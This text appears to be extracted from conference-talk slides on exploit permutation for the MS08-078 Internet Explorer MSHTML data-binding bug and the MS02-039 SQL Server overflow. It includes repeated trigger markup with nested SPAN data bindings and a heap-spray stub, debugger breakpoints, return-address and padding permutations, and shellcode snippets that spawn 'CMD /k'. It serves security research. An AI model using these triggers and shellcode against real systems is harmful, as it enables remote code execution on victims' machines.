Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
0x0a0a0a0a DATAFLD
shellcode
eax (sprayed into the heap)
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
96. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
0x0a0a0a0a DATAFLD
shellcode
eax (sprayed into the heap)
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
97. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
0x0a0a0a0a DATAFLD
shellcode
eax ecx (sprayed into the heap)
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
98. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
0x0a0a0a0a DATAFLD
shellcode
eax ecx (sprayed into the heap)
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
99. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
0x0a0a0a0a DATAFLD
shellcode
eax ecx (sprayed into the heap)
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
100. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
0x0a0a0a0a DATAFLD
shellcode
ecx (sprayed into the heap)
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
101. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
0x0a0a0a0a DATAFLD
shellcode
ecx (sprayed into the heap)
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
102. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
0x0a0a0a0a DATAFLD
shellcode
ecx (sprayed into the heap)
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
103. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
0x0a0a0a0a DATAFLD
shellcode
(sprayed into the heap)
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
104. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Trigger0 a 0 a 0 a . 0 0 n 0 0 b 0 0 r 0 0 i 0 0 t 0 0 o 0 0 . 0 0 n 0 0 e 0 0 t
0a
Data Consumer #02
XML Data Source Object #02
0x0a0a0a0a DATAFLD
shellcode
(sprayed into the heap)
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
105. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
DATASRC
Permutation 0 a . 0 0 n 0 0 b 0 0 r 0 0 i 0 0 t 0 0 o 0 0 . 0 0 n 0 0 e 0 0 t
DATAFLD
0a0a0a
Data Consumer #02
XML Data Source Object #02
0x0a0a0a0a DATAFLD
shellcode
(sprayed into the heap)
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
106. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATAFLD
0x0a0a0a0a
Exploitation
shellcode
(sprayed into the heap)
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
107. MS08-078 Breakingpoints
bp mshtml!CElement::GetAAdataFld
bp mshtml!CElement::GetAAdataSrc
bp mshtml!CCurrentRecordConsumer::Bind
bp mshtml!CCurrentRecordInstance::GetCurrentRecordInstance
bp mshtml!CXfer::CreateBinding
bp mshtml!CXfer::TransferFromSrc
bp mshtml!CXfer::Detach
bp mshtml!CRecordInstance::CRecordInstance
bp mshtml!CRecordInstance::AddBinding
bp mshtml!CRecordInstance::TransfertoDestination
bp mshtml!CRecordInstance::RemoveBinding
bp mshtml!CRecordInstance::Detach
bp mshtml!CRecordInstance::~CRecordInstance
bp mshtml!CImplPtrAry::Append
bp mshtml!CImplPtrAry::Delete
bp _MemFree
bp kernel32!HeapFree
bp ntdll!RtlFreeHeap
bp ntdll!RtlpLowFragHeapFree
108. MS08-078 Breakingpoints
bp mshtml!CElement::GetAAdataFld
bp mshtml!CElement::GetAAdataSrc
bp mshtml!CCurrentRecordConsumer::Bind
bp mshtml!CCurrentRecordInstance::GetCurrentRecordInstance
bp mshtml!CXfer::CreateBinding
bp mshtml!CXfer::TransferFromSrc
bp mshtml!CXfer::Detach
bp mshtml!CRecordInstance::CRecordInstance
bp mshtml!CRecordInstance::AddBinding
bp mshtml!CRecordInstance::TransfertoDestination
bp mshtml!CRecordInstance::RemoveBinding
bp mshtml!CRecordInstance::Detach
bp mshtml!CRecordInstance::~CRecordInstance
bp mshtml!CImplPtrAry::Append
bp mshtml!CImplPtrAry::Delete
bp _MemFree
bp kernel32!HeapFree
bp ntdll!RtlFreeHeap
bp ntdll!RtlpLowFragHeapFree
111. MS02-039 POPed
• SQL Request: • JUMP:
– CLNT_UCAST_INST (0x04). – Unconditional JUMP short, relative, and
forward to REL8.
• SQL INSTANCENAME: – There are 115 possible values to REL8.
– ASCII hexa values from 0x01 to 0xff, except: – 115 permutations.
0x0a, 0x0d, , 0x2f, 0x3a and 0x5c.
– 24,000 permutations. • Writable address and memory alignment:
– There are 26,758 new writable addresses within
• Return address: SQLSORT.DLL (Microsoft SQL Server 2000
– Uses the “jump to register” technique, in this SP0/SP1/SP2). There are much more writable
case the ESP register. addresses if do not mind making it hardcoded.
– There are four (4) new possible return addresses – Tools: “IDA Pro 5.0 Freeware” by Hex-Rays, and
within SQLSORT.DLL (Microsoft SQL Server “OlyDBG 2.01 alpha 2” by Oleh Yuschuk.
2000 SP0/SP1/SP2). There are much more return – 26,758 permutations.
addresses if do not mind making it hardcoded.
– Tools: “Findjmp.c” by Ryan Permeh, (“Hacking • Padding and memory alignment:
Proof your Network – Second Edition”, 2002), – ASCII hexa values from 0x01 to 0xff.
and “DumpOp.c” by Koskya Kortchinsky (“Macro – The length may vary, depending on JUMP, from
reliability in Win32 Exploits” – Black Hat Europe, 3,048 to 29,210 possibilities.
2007).
– 29,210 permutations.
– 4 permutations.
114. MS08-078 POPed
• CVE-2008-4844: “…crafted XML document • Data Consumer (HTML elements):
containing nested <SPAN> elements”? I do not – According to MSDN (“Binding HTML
think so… Elements to Data”) there are, at least,
fifteen (15) bindable HTML elements
• XML Data Island: available, but only five (5) elements are
– There are two (2) options: using the useful.
Dynamic HTML (DHTML) <XML> element – The HTML element is a key trigger, because
within the HTML document or overloading it points to a dereferenced XML DSO, but
the HTML <SCRIPT> element. it does not have to be the same HTML
– Unfortunately, the HTML <SCRIPT> element to do so – it can be any mixed
element is useless. HTML element.
– But there are three (03) new alternatives to – 25 permutations.
embedded a DSO.
– 4 permutations. • Return address:
– Uses “Heap Spray” technique, in this case
• XML Data Source Object (DSO): the XML DSO handles the return address,
and can use “.NET DLL” technique by Mark
– Characters like “<” and “&” are illegal in Dowd and Alexander Sotirov (“How to
<XML> element. To avoid errors <XML> Impress Girls with Browser Memory
element can be defined as CDATA Protection Bypasses” – Black Hat USA,
(Unparsed Character Data). But the <XML> 2008).
element can be also defined as “<” instead
of “<”. – There are, at least, four (4) new possible
return addresses.
– Both <IMG SRC= > and <IMAGE SRC= >
elements are useful as a XML DSO. – 4 permutations.
– 4 permutations.
115.
116. Shellcode
Regular Hadoken (波動拳)
shell: shell:
push 0x00646D63 call shell_set_cmd
mov ebx, esp db “CMD /k”, 0
push edi shell_set_cmd:
push edi pop ebx
push edi push edi
xor esi, esi push edi
push byte 18 push edi
pop ecx xor esi, esi
push byte 18
Code by Stephen Fewer (Harmony Security) and part pop ecx
of Metasploit Framework.
Ideas by sk (SCAN Associates Berhad), and published
on Phrack Magazine (issue 62, file 7).
Demonstrated on H2HC 6th Edition (2009).
117. Shellcode
Regular Hadoken (波動拳)
shell: shell:
push 0x00646D63 call shell_set_cmd
mov ebx, esp db “CMD /k”, 0
push edi shell_set_cmd:
push edi pop ebx
push edi push edi
xor esi, esi push edi
push byte 18 push edi
pop ecx xor esi, esi
push byte 18
Code by Stephen Fewer (Harmony Security) and part pop ecx
of Metasploit Framework.
Ideas by sk (SCAN Associates Berhad), and published
on Phrack Magazine (issue 62, file 7).
Demonstrated on H2HC 6th Edition (2009).
118. Shellcode
Shoryuken (昇龍拳) FPU GetPC
shell: fnstenv_getpc PROC
call shell_set_cmd ; Could be fld1, fldl2t, fldl2e,
db “CMD /k set DIRCMD=/b”, 0
; fldz, fldlg2 or fldln2.
shell_set_cmd:
pop ebx fldpi
push edi fnstenv [esp - 0Ch]
push edi pop eax
push edi add byte ptr [eax], 0Ah
xor esi, esi
assembly:
push byte 18
pop ecx fnstenv_getpc ENDP
Ideas by sk (SCAN Associates Berhad), and published Ideas by Aaron Adams, and published on VULN-DEV
on Phrack Magazine (issue 62, file 7). (November 18th, 2003).
Demonstrated on H2HC 6th Edition (2009). Demonstrated on H2HC 6th Edition (2009).
119. Shellcode
Shoryuken (昇龍拳) FPU GetPC
shell: fnstenv_getpc PROC
call shell_set_cmd ; Could be fld1, fldl2t, fldl2e,
db “CMD /k set DIRCMD=/b”, 0
; fldz, fldlg2 or fldln2.
shell_set_cmd:
pop ebx fldpi
push edi fnstenv [esp - 0Ch]
push edi pop eax
push edi add byte ptr [eax], 0Ah
xor esi, esi
assembly:
push byte 18
pop ecx fnstenv_getpc ENDP
Ideas by sk (SCAN Associates Berhad), and published Ideas by Aaron Adams, and published on VULN-DEV
on Phrack Magazine (issue 62, file 7). (November 18th, 2003).
Demonstrated on H2HC 6th Edition (2009). Demonstrated on H2HC 6th Edition (2009).
120.
121. What demo?
NO DEMONSTRATION
But you can test by yourselves!!!